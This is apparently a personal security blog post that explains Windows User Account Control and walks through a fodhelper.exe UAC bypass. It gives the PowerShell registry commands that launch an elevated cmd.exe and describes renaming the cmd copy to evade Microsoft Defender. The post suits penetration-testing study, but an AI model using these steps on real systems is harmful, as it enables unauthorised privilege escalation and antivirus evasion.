🦳
Fahad Alhawawi
  • Bypass UAC with Fodhelper
Powered by GitBook
On this page
  • What is UAC
  • How UAC works
  • Bypass UAC

Bypass UAC with Fodhelper

Last updated 1 year ago

Have you been wondering why when you want to start a program as administrator or install a new one on your windows machine there is a pop-up asking you to select Yes or No ? This is called UAC. So in this article we will explain:

  • What is UAC ?

  • How UAC works ?

  • How we mange to bypass it without any detection.

What is UAC

UAC stands for User Access Control and it's a Windows security feature that forces any new process to run in the security context of a non-privileged account by default and also ensures that important system changes are made only with approval from a user account set as an administrator. Here is an Example of UAC pop-up:

And you can change the settings from: Control Panel > User Accounts > Change Account Type Control Panel > System and Security > Security and Maintenance > Change User account Control Settings

How UAC works

In Windows, files and apps run by default without any administrative permissions. They have the same permissions as a standard user account and they cannot change the operating system, its files, or system settings. Also, they can’t change the files of another user, other than the one running them.

And in UAC there is 4 Integrity Levels are used by Window:

  • Low -> Generally used for interaction with the Internet

  • Medium -> Assigned to standard users and Administrators

  • High -> Used by Administrators' elevated tokens if UAC is enabled

  • System -> Reserved for system use.

Bypass UAC

After we know what UAC is and how it works now, our main goal is to evade the pop-up that it's showing and also to esclate our privileges without getting detected by Microsoft Defender. And also there are different techniques to bypass UAC, but in our case we used fodhelper.

Fodhelper is a trusted binary in Windows operating systems, which allows elevation without requiring a UAC prompt with most UAC settings

From the blog we can see that the bypass require you to create a new key in the current user hive and add the DelegateExecute property to the key and followed by a custom value to execute. First we create this structure in the registry in order to manipulate fodhelper to execute a command with higher privileges

New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value $program -Force

Now the main focus is the $program value in the third line that we will play with. After we get everything in place, I changed the $program value to the path of cmd to executed as Administrator.:

Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value "c:\Windows\System32\cmd.exe" -Force

When we try to lunch fodhelper.exe Microsoft Defender detect it and block it

So then I played around with this and i found out that I can bypass it by copying cmd from C:\Windows\System32\cmd.exe to C:\Users\Fh(any name).exe by changing the name and editing the value with our cmd that will evade MD and open a CMD with high Integrity:

And here you can see the different that our cmd(qw) is Elevated

In the next article we will talk about tokens and how to escalate it from Administrator priv to NT Authority. I hope you enjoyed reading it and always play around *_^

This technique was inspire by this blog in github but with little changes:

https://github.com/winscripting/UAC-bypass/blob/master/FodhelperBypass.ps1
UAC
LogoUser Account Control overviewMicrosoftLearn
LogoHow User Account Control (UAC) Affects Your ApplicationMicrosoftLearn
https://learn.microsoft.com/en-us/windows/win32/secauthz/mandatory-integrity-controllearn.microsoft.com
LogoUAC-bypass/FodhelperBypass.ps1 at master · winscripting/UAC-bypassGitHub